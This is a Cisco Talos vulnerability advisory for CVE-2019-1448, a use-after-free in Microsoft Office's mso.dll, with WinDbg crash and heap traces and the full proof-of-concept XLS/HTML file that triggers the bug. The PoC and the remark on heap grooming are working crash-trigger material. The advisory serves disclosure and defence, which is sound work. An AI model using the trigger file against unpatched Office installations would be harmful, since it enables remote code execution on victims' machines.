CVE-2019-1448
An exploitable use-after-free vulnerability exists in the mso.dll of Microsoft Office. A specially crafted XLS file can cause a use after free, resulting in a remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.
Microsoft Office Professional Plus 2016 x86 Microsoft Office 365 ProPlus x86
8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-416: Use After Free
This vulnerability is present in Microsoft Office Excel which is part of the Microsoft Office collection of software applications used in an office environment.
More precisely, the vulnerability is related with the component responsible for handling the MicrosoftÆ Office HTML and XML format introduced in Microsoft Office 2000.
A specially crafted XLS file being written in a proper form of HTML/XML tags can lead to a use-after-free vunerability and remote code execution.
Attaching debugger to Microsoft Excel and loading malformed XLS file we end up in the following context:
Critical error detected c0000374
(1708.1034): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=77c088e0 ecx=c0000374 edx=036d6c81 esi=00000002 edi=feeefeee
eip=77bdbebe esp=036d6df8 ebp=036d6e8c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246
ntdll!RtlReportCriticalFailure+0x4b:
77bdbebe cc int 3
0:000> !heap -triage
**************************************************************
* *
* HEAP ERROR DETECTED *
* *
**************************************************************
Details:
Heap address: 03850000
Error address: feeefeee
Error type: HEAP_FAILURE_INVALID_ARGUMENT
Details: The caller tried to a free a block at an invalid
(unaligned) address.
Follow-up: Check the error's stack trace to find the culprit.
Stack trace:
Stack trace at 0x77c088e0
77b2d448: ntdll!RtlFreeHeap+0xd8
0f4fdc9e: mso20win32client!Ordinal456+0x8c
06685fcd: mso!Ordinal1638+0x5a5
00feaa7e: Excel!Ordinal43+0x5daa7e
00fea2f5: Excel!Ordinal43+0x5da2f5
02019ff2: Excel!MdCallBack+0x88377f
00bd8594: Excel!Ordinal43+0x1c8594
00bd20cb: Excel!Ordinal43+0x1c20cb
00bd1789: Excel!Ordinal43+0x1c1789
00bd016c: Excel!Ordinal43+0x1c016c
00bcfc0e: Excel!Ordinal43+0x1bfc0e
00bd2540: Excel!Ordinal43+0x1c2540
00f34a8e: Excel!Ordinal43+0x524a8e
00bd2a5d: Excel!Ordinal43+0x1c2a5d
00ac34d9: Excel!Ordinal43+0xb34d9
00ac1c4e: Excel!Ordinal43+0xb1c4e
As we can see, some invalid/corrupted pointer has been passed to RtlFreeHeap causing a critical exception.
That situation occurs because of a heap overflow or due to a use after free where the pointer is a part of some released/garbage memory.
Rerunning the application and tracking execution flow before the exception appears we notice that indeed is a use-after-free vulnerability.
We can observe it setting breakpoint at location mso!Ordinal2663+0x49 and checking pointer value in the ecx register:
08108bec 8b4c241c mov ecx, dword ptr [esp+1Ch]
08108bf0 56 push esi
08108bf1 e81c2fc3ff call mso!Ordinal1699+0x26 (07d3bb12)
08108bf6 8bd0 mov edx, eax
Breakpoint 0 hit
eax=1e829830 ebx=00000002 ecx=19fa0198 edx=00000003 esi=00000001 edi=ffffffff
eip=08108bf6 esp=03cdebfc ebp=19fa1110 iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200216
mso!Ordinal2663+0x49:
08108bf6 8bd0 mov edx,eax
0:000> !heap -p -a 19fa0198
address 19fa0198 found in
_HEAP @ 4d00000
HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
19fa0180 0005 0000 [00] 19fa0198 0000c - (busy)
77bd4f6e ntdll!RtlpCallInterceptRoutine+0x00000026
77b30e3e ntdll!RtlpAllocateHeapInternal+0x0000063e
77b307d6 ntdll!RtlAllocateHeap+0x00000036
f554256 mso20win32client!Ordinal951+0x000000a9
f554211 mso20win32client!Ordinal951+0x00000064
7d3ea04 mso!Ordinal2941+0x000000c7
Using that pointer, the function call mso!Ordinal1699+0x26 returns a pointer to an object strictly related to our PoC content.
Dumping the content of the memory that the eax pointer refers to we see:
0:000> dd 1e829830
1e829830 00000007 0000006e 1a1e7238 00000024
1e829840 00000000 00000000 00000000 00000000
1e829850 ffffffff 00000000 00670061 00200073
1e829860 00320031 00200039 00780030 00300038
1e829870 00310030 00310030 00360030 00270000
1e829880 006f0062 006c006f 00200000 00610076
1e829890 0075006c 003d0065 00660027 006c0061
1e8298a0 00650073 00200000 003e002f 003c0020
0:000> du 1a1e7238
1a1e7238 " <CISCO xmlns="">TALOS</CISC"
1a1e7278 "O>....???."
Running the application further we stop again in the same place but we see that the memory state of the object we’re interested in changed dramatically:
Breakpoint 0 hit
eax=20750ee0 ebx=00000002 ecx=19fa0198 edx=00000003 esi=00000001 edi=ffffffff
eip=07528bf6 esp=030df1dc ebp=19626ed0 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
mso!Ordinal2663+0x49:
07528bf6 8bd0 mov edx,eax
0:000> !heap -p -a 19fa0198
address 19fa0198 found in
_HEAP @ 4d00000
HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
19fa0180 0005 0000 [00] 19fa0198 00020 - (free)
77be5b24 ntdll!RtlDebugFreeHeap+0x0000003c
77b9d5b7 ntdll!RtlpFreeHeap+0x0006dcc7
77b2db3d ntdll!RtlFreeHeap+0x000007cd
0f7fdc9e mso20win32client!Ordinal456+0x0000008c
10b45fd5 mso!Ordinal1638+0x000005ad
0148aa7e Excel!Ordinal43+0x005daa7e
0148a2f5 Excel!Ordinal43+0x005da2f5
024b9ff2 Excel!MdCallBack+0x0088377f
01078594 Excel!Ordinal43+0x001c8594
010720cb Excel!Ordinal43+0x001c20cb
01071789 Excel!Ordinal43+0x001c1789
0107016c Excel!Ordinal43+0x001c016c
0106fc0e Excel!Ordinal43+0x001bfc0e
01072540 Excel!Ordinal43+0x001c2540
01072a71 Excel!Ordinal43+0x001c2a71
00f634d9 Excel!Ordinal43+0x000b34d9
00f61c4e Excel!Ordinal43+0x000b1c4e
0103e747 Excel!Ordinal43+0x0018e747
0103dcf0 Excel!Ordinal43+0x0018dcf0
0e5599fd mso98win32client!Ordinal3239+0x000000b4
10891f3b mso!Ordinal3673+0x0000073f
107ab48b mso!Ordinal8171+0x00000381
0e42bd53 mso98win32client!Ordinal24+0x0000088a
1063b851 mso!Ordinal3356+0x00000ab2
0d5742a5 mso40uiwin32client!Ordinal3455+0x00000146
0d572feb mso40uiwin32client!Ordinal4414+0x00000071
0d554ee6 mso40uiwin32client!Ordinal2538+0x00007a53
0d51cc7e mso40uiwin32client!Ordinal2550+0x00000c14
0d4e5220 mso40uiwin32client!Ordinal2351+0x0000027e
0d502354 mso40uiwin32client!Ordinal3664+0x00000d40
0d56bfd7 mso40uiwin32client!Ordinal1393+0x000000b3
0:000> !heap -p -a 1e829830
ReadMemory error for address 43340000
Use `!address 43340000' to check validity of the address.
address 1e829830 found in
_HEAP @ 4d00000
HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
1e8297e0 00e2 0000 [00] 1e8297f8 00708 - (free)
as we can see, both objects have been freed. Further usage of these objects during this test leaded to a double free vulnerability:
Critical error detected c0000374
(19ac.e4): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=77c088e0 ecx=c0000374 edx=030defb1 esi=00000002 edi=20665900
eip=77bdbebe esp=030df120 ebp=030df1b4 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246
ntdll!RtlReportCriticalFailure+0x4b:
77bdbebe cc int 3
0:000> kb
# ChildEBP RetAddr Args to Child
00 030df1b4 77be4764 00000001 042e0000 77be3cfc ntdll!RtlReportCriticalFailure+0x4b
01 030df1c0 77be3cfc 404e4248 20665900 042e0000 ntdll!RtlpReportHeapFailure+0x2f
02 030df1f0 77b2d448 20665900 00000000 00000000 ntdll!RtlpLogHeapFailure+0xa7
03 030df24c 0fd2dc9e 042e0000 00000000 20665918 ntdll!RtlFreeHeap+0xd8
WARNING: Stack unwind information not available. Following frames may be wrong.
04 030df274 071602db 20665918 19625d50 20750ee0 mso20win32client!Ordinal456+0x8c
05 030df378 009baa7e 030df534 00000000 042e2468 mso!Ordinal7770+0x774
06 030df490 009ba2f5 00000100 191a3e48 00000003 Excel!Ordinal43+0x5daa7e
07 030e9fbc 019e9ff2 00000000 20678620 191a4bf8 Excel!Ordinal43+0x5da2f5
08 030ea004 005a8594 030fa28c 191a3e48 00000002 Excel!MdCallBack+0x88377f
09 030fa6cc 005a20cb 00000000 00000000 00000002 Excel!Ordinal43+0x1c8594
0a 030fa720 005a1789 00000000 00000000 00000002 Excel!Ordinal43+0x1c20cb
0b 030fcbcc 005a016c 00000000 030fcca8 030fcd68 Excel!Ordinal43+0x1c1789
0c 030fcd24 0059fc0e 00000000 00000014 030fcd68 Excel!Ordinal43+0x1c016c
0d 030fde8c 005a2540 3548a00b 00000000 00000014 Excel!Ordinal43+0x1bfc0e
0e 030fdf5c 005a2a71 00000016 00000000 00000000 Excel!Ordinal43+0x1c2540
0f 030fdf9c 004934d9 030fe838 00000016 00000000 Excel!Ordinal43+0x1c2a71
10 030fe404 00491c4e 00000016 00000000 00000000 Excel!Ordinal43+0xb34d9
11 030fe5b8 0056e747 00000016 00000000 1929dc40 Excel!Ordinal43+0xb1c4e
12 030feca4 0056dcf0 19403510 00000000 030fece8 Excel!Ordinal43+0x18e747
13 030fecb4 066199fd 026638ec 19403508 19403510 Excel!Ordinal43+0x18dcf0
14 030fece8 07271f3b 00000001 dc1dfe0e 1929dc40 mso98win32client!Ordinal3239+0xb4
15 030fed30 0718b48b 194d29a0 01000069 05fc9210 mso!Ordinal3673+0x73f
16 030fed90 064ebd53 194d29a0 00000069 05fc9210 mso!Ordinal8171+0x381
17 030fee24 0701b851 194d29a0 00000069 05fc9210 mso98win32client!Ordinal24+0x88a
18 030fee7c 05a342a5 194d29a0 00000020 05fc9210 mso!Ordinal3356+0xab2
19 030feeb0 05a32feb 18f5f310 05fc9210 191af1b0 mso40uiwin32client!Ordinal3455+0x146
1a 030feec8 05a14ee6 194d29a0 191af1b0 00000020 mso40uiwin32client!Ordinal4414+0x71
1b 030fef08 059dcc7e 18f5f310 194d29a0 1929ba80 mso40uiwin32client!Ordinal2538+0x7a53
1c 030fef4c 059a5220 1929ba80 05f680d0 05fc9210 mso40uiwin32client!Ordinal2550+0xc14
1d 030fef9c 059c2354 05f680d0 00000002 05fc9210 mso40uiwin32client!Ordinal2351+0x27e
1e 030fefd4 05a2bfd7 05f680d0 00000002 05fc9210 mso40uiwin32client!Ordinal3664+0xd40
1f 030ff010 05a8517d 1929ba80 05f680d0 030ff0ac mso40uiwin32client!Ordinal1393+0xb3
20 030ff030 05a2c0a4 19097b50 00000000 5932c70d mso40uiwin32client!Ordinal1633+0x1522
21 030ff064 05a2c4a0 19333ca8 19097b50 030ff0ac mso40uiwin32client!Ordinal1393+0x180
22 030ff0cc 059bb622 030ff384 5932c6c5 00040000 mso40uiwin32client!Ordinal345+0x1f6
23 030ff1ac 05979e59 193273e0 19333ca8 030ff384 mso40uiwin32client!Ordinal892+0xfce
24 030ff1fc 05a19bf7 193273e0 030ff328 00000000 mso40uiwin32client!Ordinal1828+0x744
25 030ff2d8 059cc8f6 193273e0 030ff328 193273ec mso40uiwin32client!Ordinal2580+0xbb
26 030ff310 059cc779 5932c425 06157b00 030ff3d4 mso40uiwin32client!Ordinal1879+0x1e1
27 030ff34c 05adc802 030ff384 00000001 00000001 mso40uiwin32client!Ordinal1879+0x64
28 030ff440 05ab397e 5932c3e5 19333ca8 19342d68 mso40uiwin32client!Ordinal373+0x33f
29 030ff48c 059bb3a6 000ff4ec 5932c205 00040000 mso40uiwin32client!Ordinal2256+0x12a
2a 030ff56c 05979e59 193273e0 19333ca8 19342d68 mso40uiwin32client!Ordinal892+0xd52
2b 030ff5bc 05a19bf7 193273e0 19342d68 00000000 mso40uiwin32client!Ordinal1828+0x744
2c 030ff694 05a8b704 193273e0 19342d68 193273e0 mso40uiwin32client!Ordinal2580+0xbb
2d 030ff6a8 05a1b057 19342d44 5932c185 00000000 mso40uiwin32client!Ordinal4322+0x165d
2e 030ff6ec 0597b134 18f59e80 01a701ff 030ff750 mso40uiwin32client!Ordinal1547+0x68d
2f 030ff71c 059d2a5c 5932cf61 004304f2 18f59e84 mso40uiwin32client!Ordinal4863+0x318
30 030ff808 059d244d 00000202 00000000 01a701ff mso40uiwin32client!Ordinal2761+0x33a
31 030ff858 77923277 00000000 00000202 00000000 mso40uiwin32client!Ordinal58+0xc65
32 030ff884 7791261b 059d23da 004304f2 00000202 USER32!_InternalCallWinProc+0x2b
33 030ff95c 77912197 004304f2 00000202 00000000 USER32!UserCallWinProcCheckWow+0x22b
34 030ff9c4 77911ff0 0044b4b4 030ffb58 0044b4e0 USER32!DispatchMessageWorker+0x197
35 030ff9d0 0044b4e0 030ffa50 030ffa44 0044b459 USER32!DispatchMessageW+0x10
36 030ffb58 003f16e3 0266be24 00000000 02f9c000 Excel!Ordinal43+0x6b4e0
37 030ffd6c 003e124f 003e0000 00000000 042e2b0b Excel!Ordinal43+0x116e3
38 030ffdb8 75489564 02f9c000 75489540 4fa28cf6 Excel!Ordinal43+0x124f
39 030ffdcc 77b5293c 02f9c000 404c4dac 00000000 KERNEL32!BaseThreadInitThunk+0x24
3a 030ffe14 77b52910 ffffffff 77b93c58 00000000 ntdll!__RtlUserThreadStart+0x2b
3b 030ffe24 00000000 003e10bd 02f9c000 00000000 ntdll!_RtlUserThreadStart+0x1b
Looking at the PoC file:
Line 1 <html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns="http://www.w3.org/TR/REC-html40">
Line 2 <xml>
Line 3 <x:ExcelWorkbook>
Line 4 <x:ExcelWorksheets>
Line 5 <x:ExcelWorksheet>
Line 6 <x:WorksheetOptions>
Line 7 <CISCO>TALOS</CISCO>
Line 8 </x:WorksheetOptions>
Line 9 </x:ExcelWorksheet>
Line 10 </x:ExcelWorksheets>
Line 11 </x:ExcelWorkbook>
Line 12 </xml>
Line 13 <!-- HEAP FENG SHUI -->
Line 14 <xml>
Line 15 <x:ExcelWorkbook>
Line 16 <x:ExcelWorksheets>
Line 17 <x:ExcelWorksheet>
Line 18 <x:WorksheetOptions>
Line 19 </x:WorksheetOptions>
Line 20 </x:ExcelWorksheet>
Line 21 </x:ExcelWorksheets>
Line 22 </x:ExcelWorkbook>
Line 23 </xml>
At line 7 we notice an element which we could observe during our analysis. Indeed, the vulnerability is related to the WorksheetOptions element and its subelements.
It turns out that an object related with the ExcelWorkbook element is persistent and if in a document there is another ExcelWorkbook element, the object will be reused.
Because our WorksheetOptions element does not contain any valid subelement related to it, the object has been released and further reused because of lines 18-19 causing the use-after-free.
Proper heap grooming can give an attacker full control of this use-after-free vulnerability and in consequence it can be turned into an arbitrary code execution.
Critical error detected c0000374
(ab8.16dc): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=77c088e0 ecx=c0000374 edx=030d6ad1 esi=00000002 edi=feeefeee
eip=77bdbebe esp=030d6c48 ebp=030d6cdc iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246
ntdll!RtlReportCriticalFailure+0x4b:
77bdbebe cc int 3
0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
KEY_VALUES_STRING: 1
Key : Analysis.CPU.Sec
Value: 6
Key : Analysis.Elapsed.Sec
Value: 6
Key : Analysis.Memory.CommitPeak.Mb
Value: 121
Key : Timeline.OS.Boot.DeltaSec
Value: 71853
Key : Timeline.Process.Start.DeltaSec
Value: 31
PROCESSES_ANALYSIS: 1
SERVICE_ANALYSIS: 1
STACKHASH_ANALYSIS: 1
TIMELINE_ANALYSIS: 1
Timeline: !analyze.Start
Name: <blank>
Time: 2019-08-08T13:47:03.496Z
Diff: 496 mSec
Timeline: Dump.Current
Name: <blank>
Time: 2019-08-08T13:47:03.0Z
Diff: 0 mSec
Timeline: Process.Start
Name: <blank>
Time: 2019-08-08T13:46:32.0Z
Diff: 31000 mSec
Timeline: OS.Boot
Name: <blank>
Time: 2019-08-07T17:49:30.0Z
Diff: 71853000 mSec
DUMP_CLASS: 2
DUMP_QUALIFIER: 0
MODLIST_WITH_TSCHKSUM_HASH: 51debefa4d02cd8de76e538ddd2f7279f0854205
MODLIST_SHA1_HASH: 019f8eb6bf67cd378230ca5d9aebb87e5b1a37a3
NTGLOBALFLAG: 70
PROCESS_BAM_CURRENT_THROTTLED: 0
PROCESS_BAM_PREVIOUS_THROTTLED: 0
APPLICATION_VERIFIER_FLAGS: 0
PRODUCT_TYPE: 1
SUITE_MASK: 272
DUMP_TYPE: fe
FAULTING_IP:
ntdll!RtlReportCriticalFailure+4b
77bdbebe cc int 3
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 77bdbebe (ntdll!RtlReportCriticalFailure+0x0000004b)
ExceptionCode: 80000003 (Break instruction exception)
ExceptionFlags: 00000000
NumberParameters: 3
Parameter[0]: 00000000
Parameter[1]: 00000000
Parameter[2]: 00000000
FAULTING_THREAD: 000016dc
PROCESS_NAME: Excel.exe
ERROR_CODE: (NTSTATUS) 0x80000003 - {WYJ TEK} Punkt przerwania Osi gni to punkt przerwania.
EXCEPTION_CODE: (HRESULT) 0x80000003 (2147483651) - Co najmniej jeden z argument w jest nieprawid owy.
EXCEPTION_CODE_STR: 80000003
EXCEPTION_PARAMETER1: 00000000
EXCEPTION_PARAMETER2: 00000000
EXCEPTION_PARAMETER3: 00000000
WATSON_BKT_PROCSTAMP: 5d173739
WATSON_BKT_PROCVER: 16.0.11328.20368
PROCESS_VER_PRODUCT: Microsoft Office
WATSON_BKT_MODULE: ntdll.dll
WATSON_BKT_MODSTAMP: 1d27c592
WATSON_BKT_MODOFFSET: ebebe
WATSON_BKT_MODVER: 10.0.16299.15
MODULE_VER_PRODUCT: MicrosoftÆ WindowsÆ Operating System
BUILD_VERSION_STRING: 16299.15.x86fre.rs3_release.170928-1534
ANALYSIS_SESSION_HOST: DESKTOP-FIEQB1A
ANALYSIS_SESSION_TIME: 08-08-2019 15:47:03.0496
ANALYSIS_VERSION: 10.0.18914.1001 x86fre
THREAD_ATTRIBUTES:
ADDITIONAL_DEBUG_TEXT: Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD]
LAST_CONTROL_TRANSFER: from 77be4764 to 77bdbebe
THREAD_SHA1_HASH_MOD_FUNC: c38cef32e8677ad30a91ee30700b7ce53fe21f0d
THREAD_SHA1_HASH_MOD_FUNC_OFFSET: ad71da21b0069034d236325f1a1b998adb590ec6
OS_LOCALE: PLK
BUGCHECK_STR: HEAP_CORRUPTION_ACTIONABLE_InvalidArgument
DEFAULT_BUCKET_ID: HEAP_CORRUPTION_ACTIONABLE_InvalidArgument
PRIMARY_PROBLEM_CLASS: HEAP_CORRUPTION
PROBLEM_CLASSES:
ID: [0n261]
Type: [ACTIONABLE]
Class: Addendum
Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
BUCKET_ID
Name: Add
Data: Add
String: [InvalidArgument]
PID: [0xab8]
TID: [0x16dc]
Frame: [2] : ntdll!RtlpLogHeapFailure
ID: [0n262]
Type: [HEAP_CORRUPTION]
Class: Primary
Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
BUCKET_ID
Name: Add
Data: Omit
PID: [0xab8]
TID: [0x16dc]
Frame: [3] : ntdll!RtlFreeHeap
STACK_TEXT:
00000000 00000000 heap_corruption!Excel.exe+0x0
THREAD_SHA1_HASH_MOD: ca4e26064d24ef7512d2e94de5a93c38dbe82fe9
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: heap_corruption!Excel.exe
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: heap_corruption
IMAGE_NAME: heap_corruption
DEBUG_FLR_IMAGE_TIMESTAMP: 0
STACK_COMMAND: !heap ; ** Pseudo Context ** ManagedPseudo ** Value: 7ffa6b0 ** ; kb
BUCKET_ID: HEAP_CORRUPTION_ACTIONABLE_InvalidArgument_heap_corruption!Excel.exe
FAILURE_EXCEPTION_CODE: 80000003
FAILURE_IMAGE_NAME: heap_corruption
BUCKET_ID_IMAGE_STR: heap_corruption
FAILURE_MODULE_NAME: heap_corruption
BUCKET_ID_MODULE_STR: heap_corruption
FAILURE_FUNCTION_NAME: Excel.exe
BUCKET_ID_FUNCTION_STR: Excel.exe
BUCKET_ID_OFFSET: 0
BUCKET_ID_MODTIMEDATESTAMP: 0
BUCKET_ID_MODCHECKSUM: 0
BUCKET_ID_MODVER_STR: 0.0.0.0
BUCKET_ID_PREFIX_STR:
FAILURE_PROBLEM_CLASS: HEAP_CORRUPTION
FAILURE_SYMBOL_NAME: heap_corruption!Excel.exe
FAILURE_BUCKET_ID: HEAP_CORRUPTION_ACTIONABLE_InvalidArgument_80000003_heap_corruption!Excel.exe
TARGET_TIME: 2019-08-08T13:47:10.000Z
OSBUILD: 16299
OSSERVICEPACK: 15
SERVICEPACK_NUMBER: 0
OS_REVISION: 0
OSPLATFORM_TYPE: x86
OSNAME: Windows 10
OSEDITION: Windows 10 WinNt SingleUserTS
USER_LCID: 0
OSBUILD_TIMESTAMP: 2016-09-06 09:40:45
BUILDDATESTAMP_STR: 170928-1534
BUILDLAB_STR: rs3_release
BUILDOSVER_STR: 10.0.16299.15.x86fre.rs3_release.170928-1534
ANALYSIS_SESSION_ELAPSED_TIME: 19d6
ANALYSIS_SOURCE: UM
FAILURE_ID_HASH_STRING: um:heap_corruption_actionable_invalidargument_80000003_heap_corruption!excel.exe
FAILURE_ID_HASH: {4c7ed077-e57f-2298-7edd-9e7a6d8bc771}
Followup: MachineOwner
---------
0:000> lmDvmmso
Browse full module list
start end module name
059c0000 0705f000 mso (export symbols) C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll
Loaded symbol image file: C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll
Image path: C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll
Image name: mso.dll
Browse all global symbols functions data
Timestamp: Fri Jun 28 21:54:19 2019 (5D16EEFB)
CheckSum: 0169B7F9
ImageSize: 0169F000
File version: 16.0.11328.20364
Product version: 16.0.11328.20364
File flags: 0 (Mask 3F)
File OS: 40004 NT Win32
File type: 2.0 Dll
File date: 00000000.00000000
Translations: 0409.04e4
Information from resource tables:
CompanyName: Microsoft Corporation
ProductName: Microsoft Office
InternalName: MSO
OriginalFilename: MSO.dll
ProductVersion: 16.0.11328.20364
FileVersion: 16.0.11328.20364
FileDescription: Microsoft Office component
2019-08-16 - Vendor Disclosure
2019-11-12 - Public Release
Discovered by Marcin 'Icewall' Noga of Cisco Talos.